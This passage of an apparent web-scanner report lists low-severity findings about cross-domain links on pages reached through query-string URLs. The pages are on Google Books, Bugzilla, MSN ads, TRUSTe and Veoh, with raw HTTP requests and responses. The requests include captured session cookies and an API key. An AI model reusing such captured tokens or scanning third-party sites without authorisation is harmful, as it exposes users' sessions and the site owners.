GET /books?id\\x3d7sgGci6LTqQC\\x26amp;printsec\\x3dfrontcover\\x26amp;dq\\x3dAbc+Development+troy\\x26amp;source\\x3dbl\\x26amp;ots\\x3ddb4QCqQ15s\\x26amp;sig\\x3drc14gUcwJik0kCBvUh0fdASkHxg\\x26amp;hl\\x3den\\x26amp;ei\\x3dCQhLTeKnNsnagQfioeT-Dw\\x26amp;sa\\x3dX\\x26amp;oi\\x3dbook_result\\x26amp;ct\\x3dresult\\x26amp;resnum\\x3d6\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CDMQ6AEwBQ\\x22\\x3e101 HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:02 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=2e381f4905a3d69e:TM=1296765122:LM=1296765122:S=_EB2n8N5S2Od-iZp; expires=Sat, 02-Feb-2013 20:32:02 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(d){this.t={};this.tick=function(e,f,b){b=b?b:(new Date).getTime();this.t[e]=[b,f]};this.tick("start",null,d)}var c=new a;window.jstiming={Time
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=p1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
</a> - <a href=http://booksearch.blogspot.com/><nobr>
...[SNIP]...

18.18. https://bugzilla.mozilla.org/show_bug.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://bugzilla.mozilla.org
Path:   /show_bug.cgi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /show_bug.cgi?id=378962 HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pm-app-bugs05
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Thu, 03 Feb 2011 22:03:58 GMT
Keep-Alive: timeout=300, max=1000
Connection: close
Content-Length: 59121

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Bug 378962 &ndash; firefox incorrectly decodeURI
...[SNIP]...
<link rel="shortcut icon" href="skins/custom/images/bugzilla.png">
<link id="shorturl" rev="canonical" href="https://bugzil.la/378962">
</head>
...[SNIP]...

18.19. http://cdn.unicast.msn.com/assets/A352/N24609/M12223/P1473/Q65369/script_300_250.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.unicast.msn.com
Path:   /assets/A352/N24609/M12223/P1473/Q65369/script_300_250.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /assets/A352/N24609/M12223/P1473/Q65369/script_300_250.js?0.9276308694587764 HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: cdn.unicast.msn.com
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135&TUID=1; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=1800
Content-Type: text/javascript
Accept-Ranges: bytes
ETag: "80f5229019c3cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Age: 1021
Date: Fri, 04 Feb 2011 02:29:40 GMT
Last-Modified: Wed, 02 Feb 2011 20:41:27 GMT
Expires: Fri, 04 Feb 2011 02:42:37 GMT
Connection: keep-alive
Content-Length: 7437

VwP65369SendR=Math.floor(Math.random()*100)==1;
VwP65369PlaceR1=new Image();
VwP65369PlaceR2=new Image();
VwP65369PlaceR1u="http://ping1.unicast.com/adstracking.gif?DV=3.80&PT=R&PID=65369&PC=1&RD="+Ma
...[SNIP]...
nicast.msn.com/script/V3.00/select"+(window.VwP65369D?"d":"")+".js";
if(!window.VwPlacementsToSelect){VwPlacementsToSelect=[];}
VwPlacementsToSelect[VwPlacementsToSelect.length]=65369;
VwP65369ImgTag="<a href='http://ad.doubleclick.net/clk;235051866;59288677;b;pc=[TPAS_ID]?http://t-mobile-coverage.t-mobile.com/4G-Network-Coverage?cm_mmc_o=Kbl5kzYCjC-czywEwllCjCWwfcByLCjC8bEfwy%208bEpBc' target='unicastTarget'><img src='http://cdn.unicast.msn.com/assets/A352/N24609/M12223/C406195/TMobile_Shirtless_300x250_img.jpg' width='300' height='250' border=0>
...[SNIP]...

18.20. http://clicktoverify.truste.com/pvr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clicktoverify.truste.com
Path:   /pvr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pvr.php?page=validate&url=www.supermedia.com&sealid=101 HTTP/1.1
Host: clicktoverify.truste.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:47:38 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
X-Powered-By: PHP/5.1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 10084


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Validation Page for Online Privacy Certification by TRUSTe</title>
<meta n
...[SNIP]...
</script>
-->
<script type="text/javascript" src="//www.google.com/jsapi?key=ABQIAAAADt6BAnD8dtel7ntjLPvCuhQzG-EGDF6M_DW9NZrYgzPLAWeW3RSMGuC347e2oypc5xlBLRH7xra_HA">
</script>
...[SNIP]...
<div class="leftSide"> <a href='http://www.supermedia.com' target="_blank"><img
   src='//www.shrinktheweb.com/xino.php?embed=1&STWAccessKeyId=1e32aadeb87fa2a&Size=xlg&stwUrl=www.supermedia.com'
   width=200>
</a> <br>
<a href='http://www.supermedia.com' target="_blank">Return to Site</a>
...[SNIP]...
<map name="repDefMap">
               <area alt="" shape="rect" coords="28,169,134,198" href="http://www.reputationdefender.com/lp/lp4_41-1.html" />
           </map>
...[SNIP]...

18.21. http://content.veoh.com/flash/f/2/v18827632jwT69n8C/b6739bfcade89b77ab0ad6be6fbe93dcb7b59733.fll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/f/2/v18827632jwT69n8C/b6739bfcade89b77ab0ad6be6fbe93dcb7b59733.fll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/f/2/v18827632jwT69n8C/b6739bfcade89b77ab0ad6be6fbe93dcb7b59733.fll?ct=de67f11eed2c08798f2b6dbe80186f489b185913cad3e87b HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:05:21 GMT
Connection: close
Location: http://veoh-182.vo.llnwd.net/Vpreviews/p/b6739bfcade89b77ab0ad6be6fbe93dcb7b59733.fll?e=1296772221&ri=4500&rs=75&h=2f7e8517e35b4a9ad97510c0dee3b897
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=484

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-182.vo.llnwd.net/Vpreviews/p/b6739bfcade89b77ab0ad6be6fbe93dcb7b59733.fll?e=1296772221&amp;ri=4500&amp;rs=75&amp;h=2f7e8517e35b4a9ad97510c0dee3b897">here</a>
...[SNIP]...

18.22. http://content.veoh.com/flash/f/2/v18972805PsBFYKpk/ad0ea62fc5d24d3130777cdc74cdd0109c7aa476.fll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/f/2/v18972805PsBFYKpk/ad0ea62fc5d24d3130777cdc74cdd0109c7aa476.fll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/f/2/v18972805PsBFYKpk/ad0ea62fc5d24d3130777cdc74cdd0109c7aa476.fll?ct=0335be327832dbc464540a37a7c84c4ac661001d4e7ea4ff HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:05:04 GMT
Connection: close
Location: http://veoh-173.vo.llnwd.net/Vpreviews/p/ad0ea62fc5d24d3130777cdc74cdd0109c7aa476.fll?e=1296772204&ri=4500&rs=75&h=640e6c8058bcf37a8e3dfa04fe84766a
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=479

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-173.vo.llnwd.net/Vpreviews/p/ad0ea62fc5d24d3130777cdc74cdd0109c7aa476.fll?e=1296772204&amp;ri=4500&amp;rs=75&amp;h=640e6c8058bcf37a8e3dfa04fe84766a">here</a>
...[SNIP]...

18.23. http://content.veoh.com/flash/f/2/v189741093prNNZM5/2216c19cb8554ece17d28dd1e8de9437c333db32.fll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/f/2/v189741093prNNZM5/2216c19cb8554ece17d28dd1e8de9437c333db32.fll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/f/2/v189741093prNNZM5/2216c19cb8554ece17d28dd1e8de9437c333db32.fll?ct=fe676d948da0489b1974ffe5222ddd293de8b627fcdc5533 HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:05:00 GMT
Connection: close
Location: http://veoh-034.vo.llnwd.net/Vpreviews/p/2216c19cb8554ece17d28dd1e8de9437c333db32.fll?e=1296772200&ri=4500&rs=75&h=75873e8b859ffa57bad194eeeadcecd7
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=437

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-034.vo.llnwd.net/Vpreviews/p/2216c19cb8554ece17d28dd1e8de9437c333db32.fll?e=1296772200&amp;ri=4500&amp;rs=75&amp;h=75873e8b859ffa57bad194eeeadcecd7">here</a>
...[SNIP]...

18.24. http://content.veoh.com/flash/f/2/v19012295Ba3j2w3K/42cbe39e8f5e7e959c9aae49c5e12121c08da4d5.fll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/f/2/v19012295Ba3j2w3K/42cbe39e8f5e7e959c9aae49c5e12121c08da4d5.fll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/f/2/v19012295Ba3j2w3K/42cbe39e8f5e7e959c9aae49c5e12121c08da4d5.fll?ct=3daa565d4aa6e20bcc6cf0eabd2e6c62955eeb97e82ece67 HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:05:10 GMT
Connection: close
Location: http://veoh-066.vo.llnwd.net/Vpreviews/p/42cbe39e8f5e7e959c9aae49c5e12121c08da4d5.fll?e=1296772210&ri=4500&rs=75&h=e94b1230cfa3fecbfb832e2b2ff4c92d
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=475

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-066.vo.llnwd.net/Vpreviews/p/42cbe39e8f5e7e959c9aae49c5e12121c08da4d5.fll?e=1296772210&amp;ri=4500&amp;rs=75&amp;h=e94b1230cfa3fecbfb832e2b2ff4c92d">here</a>
...[SNIP]...

18.25. http://content.veoh.com/flash/f/2/v19044986SycxWpNk/1aba0f0a6ceed14b7c3807714ffef4c090dc827a.fll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/f/2/v19044986SycxWpNk/1aba0f0a6ceed14b7c3807714ffef4c090dc827a.fll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/f/2/v19044986SycxWpNk/1aba0f0a6ceed14b7c3807714ffef4c090dc827a.fll?ct=a663cd78e869f56f34e7e37e34b207d21293b20e24be75f9 HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:05:06 GMT
Connection: close
Location: http://veoh-026.vo.llnwd.net/Vpreviews/f/1aba0f0a6ceed14b7c3807714ffef4c090dc827a.fll?e=1296772207&ri=4500&rs=75&h=9d08c0d4eae5a2d0d81bb103affd83cf
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=465

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-026.vo.llnwd.net/Vpreviews/f/1aba0f0a6ceed14b7c3807714ffef4c090dc827a.fll?e=1296772207&amp;ri=4500&amp;rs=75&amp;h=9d08c0d4eae5a2d0d81bb103affd83cf">here</a>
...[SNIP]...

18.26. http://content.veoh.com/flash/f/2/v19104214GeMDTRBY/613df9ebc43bd6f00d4713dcc9acd8a05cbcce8b.fll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/f/2/v19104214GeMDTRBY/613df9ebc43bd6f00d4713dcc9acd8a05cbcce8b.fll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/f/2/v19104214GeMDTRBY/613df9ebc43bd6f00d4713dcc9acd8a05cbcce8b.fll?ct=2407ddd784c7768122fca4e288b5f3f550606dad4a96cd49 HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:05:18 GMT
Connection: close
Location: http://veoh-097.vo.llnwd.net/Vpreviews/f/613df9ebc43bd6f00d4713dcc9acd8a05cbcce8b.fll?e=1296772218&ri=4500&rs=75&h=4cf2dfa4d2f3eb984db6b5113d5dd562
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=474

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-097.vo.llnwd.net/Vpreviews/f/613df9ebc43bd6f00d4713dcc9acd8a05cbcce8b.fll?e=1296772218&amp;ri=4500&amp;rs=75&amp;h=4cf2dfa4d2f3eb984db6b5113d5dd562">here</a>
...[SNIP]...

18.27. http://content.veoh.com/flash/f/2/v19225431Gcb9q3AB/ad81f90905f646d0bfcee2e2da7fec53051d2878.fll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/f/2/v19225431Gcb9q3AB/ad81f90905f646d0bfcee2e2da7fec53051d2878.fll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/f/2/v19225431Gcb9q3AB/ad81f90905f646d0bfcee2e2da7fec53051d2878.fll?ct=9673992eb222cf7e179f967e69287657d77e78836f67ed2c HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:05:14 GMT
Connection: close
Location: http://veoh-173.vo.llnwd.net/Vpreviews/f/ad81f90905f646d0bfcee2e2da7fec53051d2878.fll?e=1296772214&ri=4500&rs=75&h=efc84b2b12599a121d92922b76218f13
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=453

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-173.vo.llnwd.net/Vpreviews/f/ad81f90905f646d0bfcee2e2da7fec53051d2878.fll?e=1296772214&amp;ri=4500&amp;rs=75&amp;h=efc84b2b12599a121d92922b76218f13">here</a>
...[SNIP]...

18.28. http://content.veoh.com/flash/f/2/v19384918agTFfDaf/c7785f65451cc117cf0b3869508e3cfb3245dc5d.fll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/f/2/v19384918agTFfDaf/c7785f65451cc117cf0b3869508e3cfb3245dc5d.fll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/f/2/v19384918agTFfDaf/c7785f65451cc117cf0b3869508e3cfb3245dc5d.fll?ct=e312324cb0576c0c8b2fe23b39424fdf2dca207241c0352f HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:05:05 GMT
Connection: close
Location: http://veoh-199.vo.llnwd.net/Vpreviews/f/c7785f65451cc117cf0b3869508e3cfb3245dc5d.fll?e=1296772205&ri=4500&rs=75&h=d74f22a82e0ab87e2cf7345a89b99f15
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=500

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-199.vo.llnwd.net/Vpreviews/f/c7785f65451cc117cf0b3869508e3cfb3245dc5d.fll?e=1296772205&amp;ri=4500&amp;rs=75&amp;h=d74f22a82e0ab87e2cf7345a89b99f15">here</a>
...[SNIP]...

18.29. http://content.veoh.com/flash/i/2/v18827632jwT69n8C/b6739bfcade89b77ab0ad6be6fbe93dcb7b59733.mp4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/i/2/v18827632jwT69n8C/b6739bfcade89b77ab0ad6be6fbe93dcb7b59733.mp4

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/i/2/v18827632jwT69n8C/b6739bfcade89b77ab0ad6be6fbe93dcb7b59733.mp4?ct=0915ba0c97b1aa4b10c2e9fb95a0f84e2d092017445ea0c1 HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:05:40 GMT
Connection: close
Location: http://veoh-182.vo.llnwd.net/Vpreviews/i/b6739bfcade89b77ab0ad6be6fbe93dcb7b59733.mp4?e=1296785140&ri=5000&rs=90&h=a7b791aa764a8192763817ac40fa95a5
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=494

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-182.vo.llnwd.net/Vpreviews/i/b6739bfcade89b77ab0ad6be6fbe93dcb7b59733.mp4?e=1296785140&amp;ri=5000&amp;rs=90&amp;h=a7b791aa764a8192763817ac40fa95a5">here</a>
...[SNIP]...

18.30. http://content.veoh.com/flash/i/2/v18972805PsBFYKpk/ad0ea62fc5d24d3130777cdc74cdd0109c7aa476.mp4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/i/2/v18972805PsBFYKpk/ad0ea62fc5d24d3130777cdc74cdd0109c7aa476.mp4

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/i/2/v18972805PsBFYKpk/ad0ea62fc5d24d3130777cdc74cdd0109c7aa476.mp4?ct=6a6b9913ba4aa43ae85882d2a6c69e256353681d5ef15069 HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
